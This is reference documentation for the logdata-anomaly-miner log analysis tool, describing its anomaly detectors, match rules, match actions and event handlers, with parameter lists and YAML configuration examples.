code-block:: yaml Analysis: - type: MatchValueStreamWriter id: MatchValueStreamWriter stream: "sys.stdout" paths: - "/model/Sensors/CPUTemp" - "/model/Sensors/CPUWorkload" - "/model/Sensors/DTM" MinimalTransitionTimeDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector for minimal transition times between states (e.g. value combinations of stated paths). * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed (list of strings, **required**). * **id_path_list** parser paths where id values can be stored in all relevant log event types (list of strings, **required**). * **ignore_list** parser paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable (list of strings, default: []). * **allow_missing_id** when set to True, the detector will also use matches where one of the paths from target_path_list does not refer to an existing parsed data object (boolean, default: False). * **num_log_lines_solidify_matrix** number of processed log lines after which the matrix is solidified. This process is periodically repeated (integer, default: 10000). * **time_output_threshold** threshold for the tested minimal transition time which has to be exceeded to be tested (float, default: 0). * **anomaly_threshold** threshold for the confidence which must be exceeded to raise an anomaly (float, default: 0.05). * **persistence_id** name of the persistence document (string, default: 'Default'). * **learn_mode** specifies whether newly observed sequences should be added to the learned model (boolean, default: True). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, default: False). .. 
code-block:: yaml Analysis: - type: MinimalTransitionTimeDetector id: MinimalTransitionTimeDetector paths: - '/model/type/syscall/syscall' id_path_list: - '/model/type/syscall/id' anomaly_threshold: 0.05 MissingMatchPathValueDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This component creates events when an expected value is not seen within a given timespan. For example because the service was deactivated or logging disabled unexpectedly. This is complementary to the function provided by NewMatchPathValueDetector. For each unique value extracted by target_path_list, a tracking record is added to expected_values_dict. It stores three numbers: the timestamp the extracted value was last seen, the maximum allowed gap between observations and the next alerting time when currently in error state. When in normal (alerting) state, the value is zero. * **paths**: List of match paths to analyze in this detector. List of strings( **required**) * **learn_mode** specifies whether newly observed value combinations should be added to the learned model (boolean). * **check_interval**: This integer(seconds) defines the interval in which pre-set or learned values need to appear. Integer min:1 (Default: 3600) * **realert_interval**: This integer(seconds) defines the interval in which the AMiner should alert us about missing token values. Integer min: 1 (Default: 3600) * **persistence_id**: The name of the file where the learned models are stored. String * **output_logline**: Defines if logline should be added to the output. Boolean(Default: False) * **output_event_handlers**: List of strings with id's of the event_handlers * **suppress**: A boolean that suppresses anomaly output of that detector when set to True. .. code-block:: yaml Analysis: - type: MissingMatchPathValueDetector id: MissingMatch paths: - "/model/DiskReport/Space" check_interval: 2 realert_interval: 5 learn_mode: True .. 
seealso:: `Wiki: HowTo MissingMatchPathValueDetector `_ NewMatchIdValueComboDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This detector works similar to the NewMatchPathValueComboDetector, but allows to generate combos across multiple log events that are connected by a common value, e.g., trace ID. * **paths** parser paths of values to be analyzed (required, list of strings). * **id_path_list** one or more paths that specify trace information, i.e., an identifier that specifies which log events belong together (required, list of strings, defaults to empty list). * **min_allowed_time_diff** the minimum amount of time in seconds after the first appearance of a log atom with a specific id that is waited for other log atoms with the same id to occur. The maximum possible time to keep an incomplete combo is 2*min_allowed_time_diff (required, float, defaults to 5.0). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **allow_missing_values**: when set to True, the detector will also use matches, where one of the paths does not refer to an existing parsed data object (boolean, defaults to False). * **learn_mode** specifies whether newly observed value combinations should be added to the learned model (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **ignore_list** list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list). * **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). .. 
code-block:: yaml Analysis: - type: NewMatchIdValueComboDetector id: NewMatchIdValueComboDetector paths: - "/model/type/path/name" - "/model/type/syscall/syscall" id_path_list: - "/model/type/path/id" - "/model/type/syscall/id" min_allowed_time_diff: 5 allow_missing_values: True learn_mode: True NewMatchPathDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This class creates events when a new data path was found in a parsed atom. * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **learn_mode** specifies whether newly observed paths should be added to the learned model (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). .. code-block:: yaml Analysis: - type: NewMatchPathDetector id: NewMatchPathDetector learn_mode: True NewMatchPathValueComboDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector for new value combinations in multiple parser paths. * **paths** parser paths of values to be analyzed (required, list of strings). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **allow_missing_values**: when set to True, the detector will also use matches where one of the paths does not refer to an existing parsed data object (boolean, defaults to False). 
* **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **learn_mode** specifies whether newly observed value combinations should be added to the learned model (boolean). .. code-block:: yaml Analysis: - type: NewMatchPathValueComboDetector id: NewMatchPathValueCombo paths: - "/model/IPAddresses/Username" - "/model/IPAddresses/IP" learn_mode: True NewMatchPathValueDetector ~~~~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector for new values in a parser path. * **paths** parser paths of values to be analyzed. Multiple paths mean that values from all specified paths are mixed together (required, list of strings). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **learn_mode** specifies whether newly observed values should be added to the learned model (boolean). .. code-block:: yaml Analysis: - type: NewMatchPathValueDetector id: NewMatchPathValue paths: - "/model/DailyCron/JobNumber" - "/model/IPAddresses/Username" learn_mode: True ParserCount ~~~~~~~~~~~ This component counts occurring combinations of values and periodically sends the results as a report. * **paths** parser paths of values to be analyzed (list of strings, defaults to empty list). * **report_interval** time interval in seconds in which the reports are sent (integer, defaults to 10). * **labels** list of strings that are added to the report for each path in paths parameter (must be the same length as paths list). 
(list of strings, defaults to empty list) * **split_reports_flag** boolean flag to send a report for each path in the paths parameter separately when set to True (boolean, defaults to False). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). .. code-block:: yaml Analysis: - type: ParserCount id: ParserCount paths: - "/model/type/syscall/syscall" report_interval: 10 PathArimaDetector ~~~~~~~~~~~~~~~~~ This detector uses a tsa-arima model to analyze the values of the chosen paths. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. * **event_type_detector** used to track the number of events in the time windows. * **persistence_id** name of the persistence document. * **output_logline** specifies whether the full parsed log atom should be provided in the output. * **learn_mode** specifies whether new frequency measurements override ground truth frequencies. * **num_init** number of lines processed before the period length is calculated. * **force_period_length** states if the period length is calculated through the ACF, or if the period length is forced to be set to set_period_length. * **set_period_length** states how long the period length is if force_period_length is set to True. * **alpha** significance level of the estimated values. * **alpha_bt** significance level for the bt test. * **num_results_bt** number of results which are used in the binomial test. * **num_min_time_history** number of lines processed before the period length is calculated. * **num_max_time_history** maximum number of values of the time_history. * **num_periods_tsa_ini** number of periods used to initialize the Arima-model. .. 
code-block:: yaml Analysis: - type: "EventTypeDetector" id: ETD - type: 'PathArimaDetector' id: PTSA event_type_detector: ETD paths: ["/model/model/val1", "/model/model/val2"] num_init: 20 force_period_length: True set_period_length: 15 num_periods_tsa_ini: 10 PathValueTimeIntervalDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This detector analyzes the time intervals of the appearance of log_atoms. It sends a report if log_atoms appear at times outside of the intervals. The considered time intervals depend on the combination of values in the target_paths of target_path_list. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed (list of strings, defaults to empty list). * **persistence_id** the name of the file where the learned models are stored (string, defaults to "Default"). * **allow_missing_values** when set to True, the detector will also use matches where one of the paths from target_path_list does not refer to an existing parsed data object (boolean, defaults to True). * **ignore_list** list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to false). * **learn_mode** specifies whether new frequency measurements override ground truth frequencies (boolean). * **time_period_length** length of the time window in seconds for which the appearances of log lines are identified with each other (integer, defaults to 86400). * **max_time_diff** maximal time difference in seconds for new times. If the difference of the new time to all previous times is greater than max_time_diff, the new time is considered an anomaly (integer, defaults to 360). 
* **num_reduce_time_list** number of new time entries appended to the time list, before the list is being reduced (integer, defaults to 10). .. code-block:: yaml Analysis: - type: PathValueTimeIntervalDetector id: PathValueTimeIntervalDetector paths: - "/model/DailyCron/UName" - "/model/DailyCron/JobNumber" time_period_length: 86400 max_time_diff: 3600 num_reduce_time_list: 10 PCADetector ~~~~~~~~~~~ This class creates events if event or value occurrence counts are outliers in PCA space. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed as separate dimensions. When no paths are specified, the events given by the full path list are analyzed (list of strings). * **window_size** the length of the time window for counting in seconds (float, defaults to 600 seconds). * **min_anomaly_score** the minimum computed outlier score for reporting anomalies. Scores are scaled by training data, i.e., reasonable minimum scores are > 1 to detect outliers with respect to currently trained PCA matrix (float, defaults to 1.1). * **min_variance** the minimum variance covered by the principal components (float in range [0, 1], defaults to 0.98). * **num_windows** the number of time windows in the sliding window approach. Total covered time span = window_size * num_windows (integer, defaults to 50). * **persistence_id** name of persistency document (string, defaults to Default). * **learn_mode** specifies whether new count measurements are added to the PCA count matrix (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to false). * **ignore_list** list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list) * **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). 
* **output_event_handlers** list of event handler ids that anomalies are forwarded to (list of strings, default is to send to all event handlers). .. code-block:: yaml Analysis: - type: PCADetector id: PCADetector paths: - "/model/username" - "/model/service" window_size: 60 min_anomaly_score: 1.2 min_variance: 0.95 num_windows: 100 learn_mode: true SlidingEventFrequencyDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector for event and value frequency exceedances with a sliding window approach. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed (list of strings, defaults to empty list). * **scoring_path_list** parser paths of values to be analyzed by following event handlers like the ScoringEventHandler. Multiple paths mean that values are analyzed by their combined occurrences. * **window_size** the length of the time window for counting in seconds (float, defaults to 600). * **set_upper_limit** sets the upper limit of the frequency test to the specified value. * **local_maximum_threshold** sets the threshold for the detection of local maxima in the frequency analysis. A local maximum occurs if the last maximum of the anomaly is higher than local_maximum_threshold times the upper limit. * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **learn_mode** specifies whether new frequency measurements override ground truth frequencies (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **ignore_list** list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list). 
* **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). .. code-block:: yaml Analysis: - type: SlidingEventFrequencyDetector id: SEFD window_size: 3600 set_upper_limit: 10 TimeCorrelationDetector ~~~~~~~~~~~~~~~~~~~~~~~ This component tries to find time correlation patterns between different log atoms. When a possible correlation rule is detected, it creates an event including the rules. This is useful to implement checks as depicted in http://dx.doi.org/10.1016/j.cose.2014.09.006. .. code-block:: yaml Analysis: - type: TimeCorrelationDetector id: TimeCorrelationDetector parallel_check_count: 2 min_rule_attributes: 1 max_rule_attributes: 5 record_count_before_event: 10000 .. _TimeCorrelationViolationDetector: TimeCorrelationViolationDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This component creates events when one of the given time correlation rules is violated. This is used to implement checks as depicted in http://dx.doi.org/10.1016/j.cose.2014.09.006 .. code-block:: yaml Analysis: - type: PathExistsMatchRule id: path_exists_match_rule3 path: "/model/CronAnnouncement/Run" match_action: a_class_selector - type: PathExistsMatchRule id: path_exists_match_rule4 path: "/model/CronExecution/Job" match_action: b_class_selector - type: TimeCorrelationViolationDetector id: TimeCorrelationViolationDetector ruleset: - path_exists_match_rule3 - path_exists_match_rule4 .. seealso:: :ref:`MatchRules` SimpleMonotonicTimestampAdjust ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Adjusts decreasing timestamps of new records to the maximum observed so far to ensure monotony for other analysis components. TimestampsUnsortedDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~ This detector is useful to detect algorithm malfunction or configuration errors, e.g. invalid timezone configuration. .. 
code-block:: yaml Analysis: - type: TimestampsUnsortedDetector id: TimestampsUnsortedDetector TSAArimaDetector ~~~~~~~~~~~~~~~~ This detector uses a tsa-arima model to track appearance frequencies of event lines. * **paths** at least one of the parser paths in this list needs to appear in the event to be analyzed (list of strings). * **event_type_detector** used to track the number of event lines in the time windows (string). * **waiting_time_for_tsa** time in seconds, until the time windows are being initialized (integer, defaults to 300 seconds). * **num_sections_waiting_time_for_tsa** number of sections of the initialization window (integer, defaults to 10). * **acf_pause_interval_percentage** states which area of the results of the ACF are not used to find the highest peak (float, defaults to 0.2). * **build_sum_over_values** states if the sum of a series of counts is built before applying the TSA (boolean, defaults to false). * **num_periods_tsa_ini** Number of periods used to initialize the Arima-model (integer, defaults to 20). * **num_division_time_step** Number of divisions of the time window to calculate the time step (integer, defaults to 10). * **alpha** significance level of the estimated values (float, defaults to 0.05). * **num_min_time_history** minimal number of values of the time_history after it is initialized (integer, defaults to 20). * **num_max_time_history** maximal number of values of the time_history (integer, defaults to 30). * **num_results_bt** number of results which are used in the binomial test, which is used before reinitializing the ARIMA model (integer, defaults to 15). * **alpha_bt** significance level for the bt test (float, defaults to 0.05). * **round_time_interval_threshold** Threshold for the rounding of the time_steps to the times in self.assumed_time_steps. The higher the threshold the easier the time is rounded to the next time in the list (float, defaults to 0.02). 
* **acf_threshold** threshold, which must be exceeded by the highest peak of the cdf function of the time series, to be analyzed (float, defaults to 0.2). * **persistence_id** the name of the file where the learned models are stored (string, defaults to "Default"). * **ignore_list** list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable (list of strings, defaults to empty list). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to false). * **learn_mode** specifies whether new frequency measurements override ground truth frequencies (boolean). * **acf_auto_pause_interval** states if the pause area is automatically set. If enabled, the variable acf_pause_interval_percentage loses its functionality. * **acf_auto_pause_interval_num_min** states the number of values in which a local minima must be the minimum, to be considered a local minimum of the function and not an outlier. * **force_period_length** states if the period length is calculated through the ACF, or if the period length is forced to be set to set_period_length. * **set_period_length** states how long the period length is if force_period_length is set to True. * **min_log_lines_per_time_step** states the minimal average number of log lines per time step to make a TSA. .. code-block:: yaml Analysis: - type: 'EventTypeDetector' id: ETD save_values: False - type: 'TSAArimaDetector' id: TSA event_type_detector: ETD waiting_time_for_tsa: 1728000 num_sections_waiting_time_for_tsa: 1000 num_division_time_step: 10 alpha: 0.05 num_results_bt: 30 alpha_bt: 0.05 num_max_time_history: 30000 round_time_interval_threshold: 0.1 acf_threshold: 0.02 VerboseUnparsedAtomHandler ~~~~~~~~~~~~~~~~~~~~~~~~~~ Creates verbose output for unparsed events. 
* **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). .. code-block:: yaml Analysis: - type: 'VerboseUnparsedAtomHandler' id: vuah SimpleUnparsedAtomHandler ~~~~~~~~~~~~~~~~~~~~~~~~~~ Creates basic output for unparsed events. * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). .. code-block:: yaml Analysis: - type: 'SimpleUnparsedAtomHandler' id: vuah ValueRangeDetector ~~~~~~~~~~~~~~~~~~ This detector generates ranges for numeric values, detects values outside of these ranges, and automatically extends ranges when learning is active. * **paths** parser paths of values to be analyzed; multiple paths mean that all values occurring in these paths are considered for value range generation (required, list of strings). * **id_path_list** list of strings that specify group identifiers for which numeric ranges should be learned (list of strings, defaults to empty list). * **persistence_id** the name of the file where the learned models are stored (string, defaults to "Default"). * **learn_mode** specifies whether value ranges should be extended when values outside of ranges are observed (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean). * **ignore_list**: a list of parser paths that are ignored for analysis by this detector (list of strings, defaults to empty list). * **constraint_list**: a list of parser paths that the detector will be constrained to, i.e., other branches of the parser tree are ignored (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). .. 
code-block:: yaml Analysis: - type: 'ValueRangeDetector' paths: - '/parser/value' id_path_list: - '/parser/id' learn_mode: True VariableCorrelationDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~ First, this detector finds a list of viable variables for each event type. Second, it builds pairs of variables. Third, correlations are generated and thereafter tested and updated. * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **event_type_detector** event_type_detector. Used to get the event numbers and values of the variables, etc. * **ignore_list** list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted. * **constraint_list** list of paths that the detector will be constrained to, i.e., other branches of the parser tree are ignored (list of strings, defaults to empty list). * **num_init** minimal number of lines of one event type to initialize the correlation rules. * **num_update** number of lines after the initialization after which the correlations are periodically tested and updated. * **check_cor_thres** threshold for the number of allowed different values of the distribution to be considerd a correlation. * **check_cor_prob_thres** threshold for the difference of the probability of the values to be considerd a correlation. * **check_cor_num_thres** number of allowed different values for the calculation if the distribution can be considerd a correlation. * **min_values_cors_thres** minimal number of appearances of values on the left side to consider the distribution as a possible correlation. * **new_vals_alarm_thres** threshold which has to be exceeded by the number of new values divided by the number of old values to report an anomaly. * **disc_div_thres** diversity threshold for variables to be considered discrete. * **num_steps_create_new_rules** number of update steps, for which new rules are generated periodically. 
* **num_upd_until_validation** number of update steps, for which the rules are validated periodically. * **num_end_learning_phase** number of update steps until the update phase ends and the test phase begins. False if no End should be defined. * **num_bt** number of considered testsamples for the binomial test. * **alpha_bt** significance level for the binomialtest for the test results. * **used_homogeneity_test** states the used homogeneity test which is used for the updates and tests of the correlations. The implemented methods are ['Chi', 'MaxDist']. * **alpha_chisquare_test** significance level alpha for the chisquare test. * **max_dist_rule_distr** maximum distance between the distribution of the rule and the distribution of the read in values before the rule fails. * **used_presel_meth** used preselection methods. The implemented methods are ['matchDiscDistr', 'excludeDueDistr', 'matchDiscVals', 'random']. * **intersect_presel_meth** states if the intersection or the union of the possible correlations found by the presel_meth is used for the resulting correlations. * **percentage_random_cors** percentage of the randomly picked correlations of all possible ones in the preselection method random. * **match_disc_vals_sim_tresh** similarity threshold for the preselection method pick_cor_match_disc_vals. * **exclude_due_distr_lower_limit** lower limit for the maximal appearance to one value of the distributions. If the maximal appearance is exceeded the variable is excluded. * **match_disc_distr_threshold** threshold for the preselection method pick_cor_match_disc_distr. * **used_cor_meth** used correlation detection methods. The implemented methods are ['Rel', 'WRel']. * **used_validate_cor_meth** used validation methods. The implemented methods are ['coverVals', 'distinctDistr']. * **validate_cor_cover_vals_thres** threshold for the validation method coverVals. The higher the threshold the more correlations must be detected to be validated a correlation. 
* **validate_cor_distinct_thres** threshold for the validation method distinctDistr. The threshold states which value the variance of the distributions must surpass to be considered real correlations. The lower the value the less likely that the correlations are being rejected. .. code-block:: yaml Analysis: - type: 'EventTypeDetector' id: ETD - type: 'VariableCorrelationDetector' event_type_detector: ETD num_init: 10000 num_update: 1000 num_steps_create_new_rules: 10 used_presel_meth: ['matchDiscDistr', 'excludeDueDistr'] used_validate_cor_meth: ['distinctDistr', 'coverVals'] used_cor_meth: ['WRel'] VariableTypeDetector ~~~~~~~~~~~~~~~~~~~~ This detector analyses each variable of the event_types by assigning them the implemented variable types. * **paths** List of paths, which variables are being tested for a type. All other paths will not get a type assigned. * **learn_mode** states, if found variable types are updated when a test fails. * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **event_type_detector** event_type_detector. Used to get the event numbers and values of the variables, etc. * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to false). * **ignore_list** list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted. * **constraint_list** list of paths that the detector will be constrained to, i.e., other branches of the parser tree are ignored (list of strings, defaults to empty list). * **save_statistics** tracks the indicators and changed variable types, if set to True. * **use_empiric_distr** states if empiric distributions of the values should be used if no continuous distribution is detected * **used_gof_test** states the used test statistic for the continuous data type. Implemented are the 'KS' and 'CM' tests. 
* **gof_alpha** significance level for p-value for the distribution test of the initialization. * **s_gof_alpha** significance level for p-value for the sliding gof-test in the update step. * **s_gof_bt_alpha** significance level for the binomialtest of the test results of the s_gof-test. * **d_alpha** significance level for the binomialtest of the single discrete variables. * **d_bt_alpha** significance level for the binomialtest of the test results of the discrete tests. * **div_thres** threshold for diversity of the values of a variable. The higher the more values have to be distinct to be considered to be continuous distributed. * **sim_thres** threshold for similarity of the values of a variable. The higher the more values have to be common to be considered discrete. * **indicator_thres** threshold for the variable indicators to be used in the event indicator. * **num_init** number of lines processed before detecting the variable types. * **num_update** number of values for which the variableType is updated. * **num_update_unq** number of values for which the values of type unq is unique (last num_update + num_update_unq values are unique). * **num_s_gof_values** number of values which are tested in the s_gof-test. * **num_s_gof_bt** number of tested s_gof-tests for the binomialtest of the test results of the s_gof-tests. * **num_d_bt** number of tested discrete samples for the binomialtest of the test results of the discrete tests. * **num_pause_discrete** number of paused updates, before the discrete var type is adapted. * **num_pause_others** number of paused updates, before trying to find a new variable type for the variable type others. * **test_gof_int** states if integer number should be tested for the continuous variable type. * **num_stop_update** switch the LearnMode to False after num_stop_update processed lines. If False LearnMode will not be switched to False. 
* **silence_output_without_confidence** silences all messages without a confidence-entry. * **silence_output_except_indicator** silences all messages which are not related with the calculated indicator. * **num_var_type_hist_ref** states how long the reference for the var_type_history_list is. The reference is used in the evaluation. * **num_update_var_type_hist_ref** number of update steps before the var_type_history_list is being updated. * **num_var_type_considered_ind** this attribute states how many variable types of the history are used as the recent history in the calculation of the indicator. False if no output of the indicator should be generated. * **num_stat_stop_update** number of static values of a variable, to stop tracking the variable type and read in in eventTypeD. Default is False. * **num_updates_until_var_reduction** number of update steps until the variables are tested, if they are suitable for an indicator. If not suitable, they are removed from the tracking of EvTypeD. Set to 0 to analyze all variables. Default is 20. * **var_reduction_thres** threshold for the reduction of variable types. The most likely none others var type must have a higher relative appearance for the variable to be further checked. * **num_skipped_ind_for_weights** number of the skipped indicators for the calculation of the indicator weights. * **num_ind_for_weights** number of indicators used in the calculation of the indicator weights. * **used_multinomial_test** states the used multinomial test. Allowed values are 'MT', 'Approx' and 'Chi'. Where 'MT' means the original MT, 'Approx' is the approximation with single BTs and 'Chi' is the ChisquareTest. * **used_range_test** states the used method of range estimation. Allowed values are 'MeanSD', 'EmpiricQuantiles' and 'MinMax'. Where 'MeanSD' means the estimation through mean and standard deviation, 'EmpiricQuantiles' estimation through the empirical quantiles and 'MinMax' the estimation through minimum and maximum. 
* **range_alpha** significance level for the range variable type.
code-block:: yaml Analysis: - type: ParallelMatchRule id: parallel_match_rule sub_rules: - "and_match_rule1" - "and_match_rule2" - "negation_match_rule2" ValueDependentDelegatedMatchRule ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This component is a rule delegating rule checking to subrules depending on values found within the parser_match. The result of this rule is the result of the selected delegation rule. NegationMatchRule ~~~~~~~~~~~~~~~~~ Match elements of this component return true when the subrule did not match. .. code-block:: yaml Analysis: - type: NegationMatchRule id: negation_match_rule1 sub_rule: "value_match_rule" - type: NegationMatchRule id: negation_match_rule2 sub_rule: "path_exists_match_rule2" PathExistsMatchRule ~~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the given path was found in the parsed match data. .. code-block:: yaml Analysis: - type: PathExistsMatchRule id: path_exists_match_rule1 path: "/model/LoginDetails/PastTime/Time/Minutes" - type: PathExistsMatchRule id: path_exists_match_rule2 path: "/model/LoginDetails" ValueMatchRule ~~~~~~~~~~~~~~ Match elements of this component return true when the given path exists and has exactly the given parsed value. .. code-block:: yaml Analysis: - type: ValueMatchRule id: value_match_rule path: "/model/LoginDetails/Username" value: "root" ValueListMatchRule ~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the given path exists and has exactly one of the values included in the value list. ValueRangeMatchRule ~~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the given path exists and the value is included in [lower, upper] range. StringRegexMatchRule ~~~~~~~~~~~~~~~~~~~~ Elements of this component return true when the given path exists and the string repr of the value matches the regular expression. ModuloTimeMatchRule ~~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the following conditions are met. 
The given path exists, denotes a datetime object and the seconds since 1970 from that date modulo the given value are included in [lower, upper] range. ValueDependentModuloTimeMatchRule ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the following conditions are met. The given path exists, denotes a datetime object and the seconds since 1970 rom that date modulo the given value are included in a [lower, upper] range selected by values from the match. IPv4InRFC1918MatchRule ~~~~~~~~~~~~~~~~~~~~~~ Match elements of this component return true when the path matches and contains a valid IPv4 address from the RFC1918 private IP ranges. This could also be done by distinct range match elements, but as this kind of matching is common, have an own element for it. DebugMatchRule ~~~~~~~~~~~~~~ This rule can be inserted into a normal ruleset just to see when a match attempt is made. It just prints out the current log_atom that is evaluated. The match action is always invoked when defined, no matter which match result is returned. DebugHistoryMatchRule ~~~~~~~~~~~~~~~~~~~~~ This rule can be inserted into a normal ruleset just to see when a match attempt is made. It just adds the evaluated log_atom to a ObjectHistory. .. _MatchAction: ---------- MatchActions ---------- .. note:: MatchActions must be defined in the "Analysis"-part of the configuration. EventGenerationMatchAction ~~~~~~~~~~~~ This generic match action forwards information about a rule match on parsed data to a list of event handlers. .. code-block:: yaml Analysis: - type: EventGenerationMatchAction id: ip_match_action event_type: "Analysis.Rules.IPv4InRFC1918MatchRule" event_message: "Private IP address occurred!" AtomFilterMatchAction ~~~~~~~~~~~~ This generic match rule forwards all rule matches to a list of `AtomHandlerInterface` instances using the `SubhandlerFilter`. 
When `delete_components` is used, all components from the `subhandler_list` are removed from the default `SubhandlerFilter`. .. code-block:: yaml Analysis: - type: NewMatchPathValueDetector id: NewMatchPathValueDetector1 paths: - "/model/second" - type: AtomFilterMatchAction id: afma subhandler_list: - NewMatchPathValueDetector1 stop_when_handled_flag: True delete_components: True ------------- EventHandling ------------- EventHandler are output modules that allow the logdata-anomaly-miner to write alerts to specific targets. All EventHandler must have the following parameters and may have additional specific parameters that are defined in the respective sections. * **id**: must be a unique string (required) * **type**: must be an existing Analysis component (required) * **json**: A boolean value that enables that the output is formatted in json (default: False) * **pretty**: A boolean value that specifies whether json output should be in a single line (False) or pretty printed (True) (default: True) * **score**: A boolean value that enables that a confidence is added to the output of certain detectors (default: False) * **weights**: A dictionary that specifies the weights of values for the scoring. The keys are the strings of the analyzed list and the corresponding values are the assigned weights. Strings that are not present in this dictionary have the weight 0.5 if not automatically weighted (default: None) * **auto_weights**: A boolean value that states if the weights should be automatically calculated through the formula 10 / (10 + number of value appearances) (default: False) * **auto_weights_history_length**: A integer value that specifies the number of values that are considered in the calculation of the weights (default: 1000) StreamPrinterEventHandler ~~~~~~~~~~~~~~~~~~~~~~~~~ The StreamPrinterEventHandler writes alerts to a stream. 
If no output_file_path is defined, it writes the output to **stdout** * **output_file_path**: This string value defines a file where the output should be written to. Default: stdout .. code-block:: yaml EventHandlers: # output to stdout: - id: 'stpe' type: 'StreamPrinterEventHandler' # output json to file: - id: 'stpefile' type: 'StreamPrinterEventHandler' json: true pretty: true output_file_path: '/tmp/aminer_out.log' SyslogWriterEventHandler ~~~~~~~~~~~~~~~~~~~~~~~~ The SyslogWriterEventHandler writes alerts to the local syslog instance. .. warning:: USE THIS AT YOUR OWN RISK: by creating aminer/syslog log data processing loops, you will flood your syslog and probably fill up your disks.0 * **instance_name**: This string defines the instance_name for the syslog. Default: **aminer** .. code-block:: yaml EventHandlers: - id: 'swe' type: 'SyslogWriterEventHandler' instance_name: 'logdata-anomaly-miner' KafkaEventHandler ~~~~~~~~~~~~~~~~~ The KafkaEventHandler writes it's output to a `Kafka Message-Queue `_ * **topic**: String property with the topic-name for the message queue * **cfgfile**: String property with the path to the kafka-config file. A comprehensive list of all config-parameters can be found at https://kafka-python.readthedocs.io/en/master/apidoc/KafkaProducer.html A typical kafka-config-file might look like this: .. code-block:: yaml [DEFAULT] bootstrap_servers = localhost:9092 security_protocol = PLAINTEXT .. note:: The header [DEFAULT] is important and must exist in the configuration file .. code-block:: yaml EventHandlers: # output to kafka using the topic 'aminer' - id: 'mqe' json: True topic: 'aminer' cfgfile: '/etc/aminer/kafka-client.conf' type: 'KafkaEventHandler' ZmqEventHandler ~~~~~~~~~~~~~~~ The ZmqEventHandler writes its output to a `Zero Message-Queue `_ * **topic**: String property with the topic-name for the message queue. If topic is not defined, then this handler will send messages without any topic. 
